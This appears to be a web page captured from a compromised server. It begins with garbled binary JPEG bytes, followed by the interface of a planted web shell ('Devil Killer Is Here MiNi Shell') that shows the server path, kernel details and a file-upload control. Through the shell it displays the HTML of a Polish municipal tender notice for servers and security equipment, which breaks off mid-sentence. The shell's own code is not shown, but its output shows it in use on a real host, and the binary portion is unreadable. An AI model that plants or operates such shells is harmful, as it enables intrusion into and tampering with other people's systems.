JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240820/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240820/0046389501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu komputerowego wraz z oprogramowaniem w ramach Grantu w projekcie „Cyberbezpieczna Gmina Mały Płock” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Mały Płock</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Gmina Mały Płock</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 450669878</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jana Kochanowskiego 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mały Płock</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">18-516</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">862791312</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">862791250</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ugmplock@malyplock.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.malyplock.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu komputerowego wraz z oprogramowaniem w ramach Grantu w projekcie „Cyberbezpieczna Gmina Mały Płock” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f8b6c65e-6ba4-49e7-97c6-c5200472e009</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00463895</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00029480/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Dostawa sprzętu komputerowego wraz z oprogramowaniem w ramach Grantu w projekcie „Cyberbezpieczna Gmina Mały Płock”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Fundusze Europejskie na Rozwój Cyfrowy (FERC) </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gminamalyplock.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://gminamalyplock.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Osobami uprawnionymi do kontaktu z Wykonawcami są: <br/>1)	w sprawach merytorycznych – Przemysław Wesołowski – pwesolowski@malyplock.pl,<br/>2)	w sprawach proceduralnych – Radosław Borawski – rborawski@malyplock.pl.<br/>2. W niniejszym postępowaniu komunikacja zamawiającego z wykonawcami odbywa się za pomocą środków komunikacji<br/>elektronicznej.<br/>3. Pytania do SWZ należy zadawać za pośrednictwem platformy zakupowej zamawiającego przez link:<br/>https://gminamalyplock.ezamawiajacy.pl.Instrukcja korzystania z systemu jest dostępna pod wyżej wskazanym adresem.<br/>4. Oferta wraz z załącznikami musi być złożona w postaci elektronicznej w systemie informatycznym dostępnym pod adresem<br/>https://gminamalyplock.ezamawiajacy.pl.<br/>5. Za datę złożenia oferty, przekazania wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na platformę zakupową zamawiającego,<br/>opisane zostały w Instrukcji dla wykonawców która jest udostępniana na platformie zakupowej zamawiającego.<br/>6. Wymagania dotyczące zasad rejestracji oraz minimalnych parametrów technicznych wymaganych od wykonawcy przy<br/>wykorzystywaniu systemu do elektronicznej komunikacji z wykonawcami Oferta wraz z załącznikami musi zostać złożona w postaci<br/>elektronicznej. Złożenie oferty wymaga do Wykonawcy zarejestrowania się i zalogowania w systemie informatycznym dostępnym<br/>pod adresem https://gminamalyplock.ezamawiajacy.pl, zgodnie z poniższą kolejnością. Rejestracja wykonawcy trwa maksymalnie<br/>do 2 dni roboczych. Mając to na uwadze, zamawiający zaleca wykonawcom<br/>uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia oferty w postaci elektronicznej. Wykonawca po wybraniu opcji<br/>„przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o<br/>możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca biorący udział w postępowaniu prowadzonym drogą<br/>elektroniczną w systemie zakłada konto, wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie<br/>powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. Po założeniu konta wykonawca ma<br/>możliwość złożenia oferty w postępowaniu.<br/>7. Zamawiający wskazuje informacje, o których mowa w Rozporządzenia Prezesa Rady Ministrów w sprawie użycia środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępnienia i przechowywania dokumentów<br/>elektronicznych, dotyczące systemu dostępnego pod adresem https://gminamalyplock.ezamawiajacy.pl:<br/>• komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta,<br/>• wybrana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google Chrome lub MS Edge,<br/>• podłączenie do Internetu: min. 512 Kb/s na komputer (zalecane szerokopasmowe łącze internetowe);<br/>Z uwagi na ograniczoną wartość pola, która nie może być dłuższa niż 4000 znaków Zamawiający informuje, że pozostałe informacje<br/>w zakresie wymogów technicznych i organizacyjnych dot. korespondencji elektronicznej określono w rozdziale X Specyfikacji<br/>Warunków Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <p class="mb-0">angielski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	Administratorem Pani/Pana danych osobowych jest Wójt Gminy Mały Płock, ul. Jana Kochanowskiego 15, 18-516 Mały Płock, tel. 86 279 13 12, e-mail: ugmplock@malyplock.pl.<br/>	Kontakt z Inspektorem Ochrony Danych w Urzędzie Gminy w Małym Płocku jest możliwy pod adresem:<br/>•	Urząd Gminy w Małym Płocku, ul. Jana Kochanowskiego 15, 18-516 Mały Płock<br/>•	email: iod@malyplock.pl<br/>Z Inspektorem Ochrony Danych można kontaktować się we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych osobowych.<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięcia, jak również zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia publicznego i jego archiwizacji;<br/>	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych, dalej „ustawa Pzp” oraz podmioty świadczące usługi związane z obsługą systemów i oprogramowania informatycznego administratora; <br/>	Pani/Pana dane osobowe w przypadku postępowań o udzielenie zamówienia publicznego będą przechowywane przez okres oznaczony kategorią archiwalną wskazaną w Jednolitym Rzeczowym Wykazie Akt. Dla dokumentów wytworzonych w ramach zamówień publicznych jest to okres 5 lat. Natomiast umowy wraz z dokumentacją dotyczącą ich realizacji, niezależnie od trybu w jakim zostały zawarte, przechowywane są przez okres 10 lat. Okres przechowywania liczony jest od 1 stycznia roku następnego od daty zakończenia sprawy. Po upływie okresu przechowywania dokumentacja niearchiwalna podlega, po uzyskaniu zgody dyrektora właściwego archiwum państwowego, brakowaniu;<br/>	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **; ***, ****<br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego.<br/><br/>* Wyjaśnienie: skorzystanie przez osobę, której dane dotyczą z uprawnienia do sprostowania lub uzupełnienia danych osobowych nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp.<br/>** Wyjaśnienie: Skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może naruszać integralności protokołu postępowania oraz jego załączników.<br/>*** Wyjaśnienie: W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679.<br/>**** Wyjaśnienie: Wystąpienie z żądaniem, o którym mowa w art. 18 ust 1 Rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania o udzielenie zamówienia publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OGPŚ.271.16.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa sprzętu komputerowego wraz z oprogramowaniem:<br/>1)	Serwer aplikacyjny z oprogramowaniem (dostawa, instalacja i konfiguracja) – 2 szt.<br/>2)	Serwer do logów (monitoringu), (dostawa, instalacja i konfiguracja) - 2 szt.<br/>3)	Serwer do przechowywania danych Typ 1 (NAS – dostawa, instalacja i konfiguracja) – 1 szt.<br/>4)	Serwer do przechowywania danych Typ 2 (NAS – dostawa, instalacja i konfiguracja) – 2 szt.<br/>5)	Oprogramowanie do wykonywania kopii zapasowych – 2 kpl.<br/>6)	Przełącznik sieciowy – Typ 1 (dostawa instalacja i konfiguracja) – 2 szt.<br/>7)	Przełącznik sieciowy – Typ 2 (dostawa, instalacja i konfiguracja) – 1 szt.<br/>8)	Zasilacz awaryjny UPS – Typ1 (dostawa i instalacja) – 1 szt.<br/>9)	Zasilacz awaryjny UPS – TYP 2 (dostawa i instalacja) – 1 szt.<br/>10)	Oprogramowanie do monitorowania logów – 2 kpl.<br/>11)	Oprogramowanie do monitorowanie infrastruktury IT – 1 kpl.<br/>12)	UTM wraz z subskrybcjami (dostawa, instalacja i konfiguracja) – 2 kpl.<br/>13)	Dysk zewnętrzny – 3 szt.<br/>- Zgodnie z art. 101 ust. 4 ustawy Pzp w sytuacji, gdyby w dokumentach opisującym przedmiot zamówienia, zawarto odniesienie do norm, ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 ustawy Pzp, a takim odniesieniom nie towarzyszyło wyrażenie „lub równoważne”, to Zamawiający dopuszcza rozwiązania równoważne opisywanym w każdej takiej normie, ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych. W związku z powyższym należy przyjąć, że każdej: normie, ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub równoważne”. <br/>- Zgodnie z art. 101 ust. 5 ustawy Pzp w przypadku gdy opis przedmiotu zamówienia odnosi się do norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 oraz ust. 3 ustawy Pzp oferowane świadczenie nie musi być zgodne z wymaganymi normami, ocenami technicznymi, specyfikacjami technicznymi i systemami referencji technicznych, do których odnosi się opis przedmiotu zamówienia, ale wykonawca jest zobowiązany udowodnić w ofercie, poprzez dołączenie do oferty stosownych środków przedmiotowych, o których mowa w art. 104 – 107 ustawy Pzp, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia. <br/>- Gdy opis przedmiotu zamówienia został skonstruowany poprzez określenie wymagań dotyczących wydajności lub funkcjonalności, o których mowa w art. 101 ust. 1 pkt 1 ustawy Pzp wówczas, zgodnie z art. 101 ust. 6 ustawy Pzp, wykonawca może powołać się na zgodność oferowanych świadczeń ze stosownymi normami, ocenami technicznymi, specyfikacjami i systemami referencji technicznych, jeżeli dotyczą one wymagań w zakresie wydajności lub funkcjonalności określonych przez zamawiającego, pod warunkiem że wykonawca udowodni w ofercie, że obiekt budowlany, dostawa lub usługa, spełniają wymagania dotyczące wydajności lub funkcjonalności określone przez zamawiającego. <br/><br/>2.	Koszty transportu urządzeń, oprogramowania wchodzących w skład przedmiotu zamówienia do Zamawiającego ponosi Wykonawca.<br/>3.	Miejsce dostawy – Urząd Gminy w Małym Płocku, ul. Jana Kochanowskiego 15, 18-516 Mały Płock.<br/>4.	Szczegółowy opis przedmiotu zamówienia określony jest w załączniku Nr 4 do SWZ. Dane techniczne wymienione w przedmiotowym załączniku stanowią minimalne wymagania, jakie musi spełniać oferowany przedmiot zamówienia. <br/>5.	Odbiór urządzeń i oprogramowania wchodzących w skład przedmiotu zamówienia zostanie potwierdzony protokołem odbioru, który stanowił będzie podstawę do wystawienia faktury przez Wykonawcę.<br/>6.	Warunki realizacji zamówienia zawarte zostały w projektowanych postanowieniach umowy zawartych w załączniku nr 5 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48820000-2 - Serwery</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32413100-2 - Rutery sieciowe</p> <p class="mb-0">31214100-0 - Przełączniki</p> <p class="mb-0">31682530-4 - Awaryjne urządzenia energetyczne</p> <p class="mb-0">30233000-1 - Urządzenia do przechowywania i odczytu danych</p> <p class="mb-0">48710000-8 - Pakiety oprogramowania do kopii zapasowych i odzyskiwania</p> <p class="mb-0">30232000-4 - Sprzęt peryferyjny</p> <p class="mb-0">72263000-6 - Usługi wdrażania oprogramowania</p> <p class="mb-0">51000000-9 - Usługi instalowania (z wyjątkiem oprogramowania komputerowego)</p> <p class="mb-0">72265000-0 - Usługi konfiguracji oprogramowania</p> <p class="mb-0">48620000-0 - Systemy operacyjne</p> <p class="mb-0">48421000-5 - Pakiety oprogramowania do zarządzania urządzeniami</p> <p class="mb-0">32420000-3 - Urządzenia sieciowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W celu wyboru najkorzystniejszej oferty Zamawiający przyjął następujące kryteria oceny ofert przypisując im odpowiednio wagi punktowe:<br/><br/>Cena - waga 100 pkt.<br/><br/>C = [Najniższa cena oferty /Cena oferty badanej] x 100.<br/><br/>Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który spełni wszystkie postawione Specyfikacji Warunków Zamówienia warunki oraz uzyska łącznie największą liczbę punktów, wyliczoną zgodnie z poniższym wzorem:<br/>Całkowita ocena badanej oferty będzie liczona zgodnie z wzorem:<br/>P= C<br/>gdzie:<br/>P – liczba punktów przyznanych badanej ofercie,<br/>C – Liczba punktów uzyskanych przez badaną ofertę w kryterium „Cena”.<br/><br/>Ocena będzie dokonana z dokładnością do dwóch miejsc po przecinku. Punktacja obliczona ze wzorów zostanie zaokrąglona do dwóch miejsc po przecinku wg poniższych zasad:<br/>a)	jeśli po cyfrze zaokrąglanej znajduje się 0,1,2,3, albo 4 to zaokrąglamy w dół.<br/>b)	jeśli po cyfrze zaokrąglanej znajduje się 5,6,7,8 albo 9 to zaokrąglamy w górę.<br/><br/>Na podstawie powyższych kryteriów zostanie sporządzone zbiorcze zestawienie oceny ofert. Najwyższa liczba punktów uzyskanych w kryterium ceny wyznaczy najkorzystniejszą ofertę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, dotyczące: <br/>1)	zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/><br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/> <br/>3)	sytuacji ekonomicznej lub finansowej: <br/> Zamawiający nie stawia warunku w powyższym zakresie. <br/> <br/>4)	zdolności technicznej lub zawodowej: <br/><br/>a)	Zamawiający uzna, że wykonawca 